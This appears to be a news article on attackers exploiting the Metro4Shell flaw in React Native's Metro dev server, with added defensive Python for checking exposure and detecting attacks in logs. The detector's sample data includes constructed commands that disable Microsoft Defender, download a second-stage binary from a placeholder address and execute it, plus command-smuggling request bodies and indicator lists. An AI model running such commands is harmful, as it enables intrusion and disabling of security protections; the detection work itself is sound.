
Hackers Exploit Critical Flaw in React Native for Over a Month
TL;DR
Since December 21, 2025, attackers have been exploiting CVE-2025-11953 (Metro4Shell), a CVSS 9.8 unauthenticated command-execution flaw in the Metro development server that ships with React Native, the framework for building Android and iOS apps. VulnCheck's honeypots recorded the attacks roughly a month before much of the public discussion stopped calling the bug theoretical.
Since December 21, 2025, cybercriminals have been exploiting a severe vulnerability in the Metro development server, a core component of the React Native platform used to build mobile applications for Android and iOS. The flaw, tracked as CVE-2025-11953 and dubbed Metro4Shell, carries a CVSS score of 9.8 out of 10, the critical range.
The discovery was made by researchers at the cybersecurity company VulnCheck, using honeypot systems that record real attacks. The attackers target an endpoint named /open-url, which with the default configuration can end up reachable from the internet.
Vulnerable Development Environment
Metro is the development server that bundles ("packages") JavaScript code so developers can test their applications. It is meant to run only on the developer's machine and has no authentication, so if it is exposed, anyone who can reach its port can send a single request to the vulnerable endpoint and execute commands on the system. The /open-url route is provided by the React Native community CLI's dev-server middleware (the @react-native-community/cli-server-api package), which is where the patch landed.
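A quick local check for the exposure described above, added here as an example (it is not code from the article, VulnCheck or the Metro project): it parses `ss -ltnp` output on Linux and reports Metro-port listeners bound to a wildcard or non-loopback address. Metro's default port 8081 is assumed, and the sample `ss` output is constructed for the demo.

```python
"""Report Metro dev-server listeners that are reachable from other hosts.

Added example (not code from the article, VulnCheck or the Metro project).
Parses `ss -ltnp` output on Linux; the port list and the sample output are
assumptions constructed for the demo.
"""
import ipaddress
import subprocess

METRO_PORTS = {8081}  # Metro's default port; add any custom --port values you use

# Constructed `ss -ltnp` output: one Metro bound to all interfaces, one to loopback.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      511    0.0.0.0:8081        0.0.0.0:*         users:(("node",pid=4242,fd=23))
LISTEN 0      511    127.0.0.1:8081      0.0.0.0:*         users:(("node",pid=4243,fd=21))
LISTEN 0      4096   [::]:22             [::]:*            users:(("sshd",pid=801,fd=3))
"""


def split_addr_port(local):
    """Split ss's Local Address:Port column, e.g. '[::]:8081' -> ('::', 8081)."""
    host, _, port = local.rpartition(":")
    return host.strip("[]"), int(port)


def accepts_remote(host):
    """True if a bind address lets other machines connect (wildcard or non-loopback)."""
    if host in ("*", "", "0.0.0.0", "::"):
        return True
    try:
        return not ipaddress.ip_address(host).is_loopback
    except ValueError:
        return True  # unparseable address: fail closed and report it


def exposed_metro_listeners(ss_output, ports=METRO_PORTS):
    """Return (host, port, process) for listeners on Metro ports reachable off-host."""
    findings = []
    for line in ss_output.splitlines():
        cols = line.split()
        if len(cols) < 5 or cols[0] != "LISTEN":
            continue  # header line or non-listening socket
        host, port = split_addr_port(cols[3])
        if port in ports and accepts_remote(host):
            findings.append((host, port, cols[5] if len(cols) > 5 else ""))
    return findings


def check_this_host():
    """Run ss on the local machine and return exposed Metro listeners ([] if no ss)."""
    try:
        proc = subprocess.run(["ss", "-ltnp"], capture_output=True, text=True, check=False)
    except FileNotFoundError:
        return []
    return exposed_metro_listeners(proc.stdout)


if __name__ == "__main__":
    for host, port, process in exposed_metro_listeners(SAMPLE_SS):
        print(f"sample: EXPOSED {host}:{port} {process}")
    for host, port, process in check_this_host():
        print(f"live:   EXPOSED {host}:{port} {process}")
```

Any hit means the dev server is reachable from other machines: bind Metro to the loopback interface (the React Native CLI's `start` command accepts a `--host` option), put it behind a firewall rule for the device you actually test on, and update to a patched release.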
The vulnerability was first documented by JFrog in November 2025, which published a technical analysis. Several proof-of-concept exploits then appeared on GitHub, lowering the bar for less skilled attackers.
Attack Method
The attacks VulnCheck captured followed a repeating pattern: they occurred on three distinct dates and always used the same malicious files, pointing to a single, organized operation.
The attack chain has five stages. First, the attackers use curl to send a command through the vulnerable endpoint, encoded in Base64 to disguise it. Once decoded and run, the script identifies working directories and disables Microsoft Defender protections.
With the defenses down, the script connects to an attacker-controlled server, downloads a malicious executable and runs it with encrypted arguments.
The malware is written in Rust and packed with UPX, carries anti-analysis logic that slows examination by security researchers, and also has a Linux build, widening its reach.
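The chain above, turned into log-level detection logic: an added example, not code from VulnCheck, JFrog or the Metro project. It reads JSON-lines access records from a Metro server or honeypot, flags POST requests to /open-url from untrusted sources, decodes Base64 blobs in the body (both PowerShell's UTF-16LE -EncodedCommand form and a plain `base64 -d` pipeline, so it also covers the Linux variant), and matches the decoded stage-1 against indicators for the Defender tampering, second-stage download and execution stages. The log format, sample records, payloads, indicator strings and trusted networks are all assumptions constructed for the demo; the real exploit's injection syntax is not reproduced.

```python
"""Flag Metro4Shell-style requests in Metro / honeypot HTTP access logs.

Added example; not code from VulnCheck, JFrog or the Metro project. It encodes the
pattern the article describes: a POST to /open-url from an untrusted address whose
body carries a Base64-disguised command that disables Defender, fetches a second
stage and runs it. The JSON-lines log format, the sample records, the stage-1
payloads, the indicator strings and the trusted networks are assumptions
constructed for the demo; the real exploit's injection syntax is not reproduced.
"""
import base64
import binascii
import ipaddress
import json
import re

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL = re.compile(r"https?://[^\s\"'<>;|&]+")

# Addresses allowed to talk to a dev server: this host and (assumed) RFC 1918 LANs
# where test phones live. Tighten to loopback only if devices connect via a tunnel.
TRUSTED_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "::1/128", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Behaviour the article describes, as assumed indicator strings per stage.
INDICATORS = {
    "defender_tamper": ("Set-MpPreference", "Add-MpPreference", "DisableRealtimeMonitoring"),
    "stage2_download": ("Invoke-WebRequest", "DownloadFile", "curl ", "wget "),
    "stage2_execute": ("Start-Process", "chmod +x", "| sh", "| bash"),
}


def is_untrusted(src):
    """True unless src parses as an address inside TRUSTED_NETS."""
    try:
        ip = ipaddress.ip_address(src)
    except ValueError:
        return True
    return not any(ip in net for net in TRUSTED_NETS)


def decode_b64_blobs(text):
    """Decode Base64 runs in text; handles PowerShell -enc (UTF-16LE) and plain UTF-8."""
    decoded = []
    for token in B64_TOKEN.findall(text):
        try:
            raw = base64.b64decode(token, validate=True)
            # PowerShell -EncodedCommand is UTF-16LE: every odd byte of ASCII text is NUL.
            enc = "utf-16le" if raw[1::2].count(0) > len(raw) // 4 else "utf-8"
            out = raw.decode(enc)
        except (binascii.Error, UnicodeDecodeError):
            continue  # not Base64, or not text: skip it
        if out and all(c.isprintable() or c.isspace() for c in out):
            decoded.append(out)
    return decoded


def analyze_record(rec):
    """Return a finding for one log record, or None when nothing is suspicious."""
    if rec.get("method") != "POST" or not rec.get("uri", "").startswith("/open-url"):
        return None
    reasons, iocs = [], set()
    if is_untrusted(rec.get("src", "")):
        reasons.append("open_url_from_untrusted_source")
    body = rec.get("body", "")
    for text in [body] + decode_b64_blobs(body):
        for stage, needles in INDICATORS.items():
            if stage not in reasons and any(n in text for n in needles):
                reasons.append(stage)
        iocs.update(URL.findall(text))  # C2 / payload hosts seen in any stage
    return {"src": rec.get("src"), "reasons": reasons, "iocs": sorted(iocs)} if reasons else None


def analyze_log(jsonl):
    """Run analyze_record over JSON-lines text and return the findings."""
    records = (json.loads(line) for line in jsonl.splitlines() if line.strip())
    return [f for f in map(analyze_record, records) if f]


# --- constructed sample data (not real attacker payloads) --------------------
WIN_STAGE1 = ("$d = Get-Location; Set-MpPreference -DisableRealtimeMonitoring $true; "
              "Invoke-WebRequest http://198.51.100.23/update.exe -OutFile u.exe; "
              "Start-Process u.exe -ArgumentList 'cfg'")
NIX_STAGE1 = "curl -s http://198.51.100.23/u -o /tmp/u; chmod +x /tmp/u; /tmp/u"
WIN_ENC = base64.b64encode(WIN_STAGE1.encode("utf-16le")).decode()
NIX_ENC = base64.b64encode(NIX_STAGE1.encode()).decode()


def _rec(src, uri, body, method="POST"):
    return json.dumps({"src": src, "method": method, "uri": uri, "body": body})


SAMPLE_LOG = "\n".join([
    _rec("127.0.0.1", "/open-url", json.dumps({"url": "http://localhost:8081/debugger-ui"})),
    _rec("192.168.1.20", "/status", "", method="GET"),
    _rec("203.0.113.7", "/open-url", json.dumps({"url": "x & powershell -nop -w hidden -enc " + WIN_ENC})),
    _rec("203.0.113.7", "/open-url", json.dumps({"url": "x; echo " + NIX_ENC + " | base64 -d | sh"})),
])

if __name__ == "__main__":
    print(json.dumps(analyze_log(SAMPLE_LOG), indent=2))
```

The network-level equivalent is a Suricata rule matching POST requests to /open-url, the kind of rule the article credits VulnCheck with having in place. The body decoding here is what lets an analyst pivot from that alert to the download host without ever running the payload.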
Disconnection Between Perception and Reality
VulnCheck points to a worrying disconnect: exploitation began in December, yet many public discussions through the end of January still classed the vulnerability as a "theoretical risk". The report stresses that attackers do not wait for official warnings or security updates.
The Known Exploited Vulnerabilities (KEV) catalog maintained by the Cybersecurity & Infrastructure Security Agency (CISA) is often updated late. Widely used development tools like Metro make easy targets, since they rarely get the same monitoring as production systems.
Importance of Early Detection
VulnCheck detected the initial exploitation because it had already built exploit emulations and Suricata intrusion-detection rules for the vulnerability, so its systems were configured to recognize the attacks as soon as they began.
The company added CVE-2025-11953 to its own exploited-vulnerabilities list on the day the first attack was observed, underlining the need for continuous vigilance in development environments.
For more news on security and technology, follow TecMundo on social media and subscribe to our newsletter.


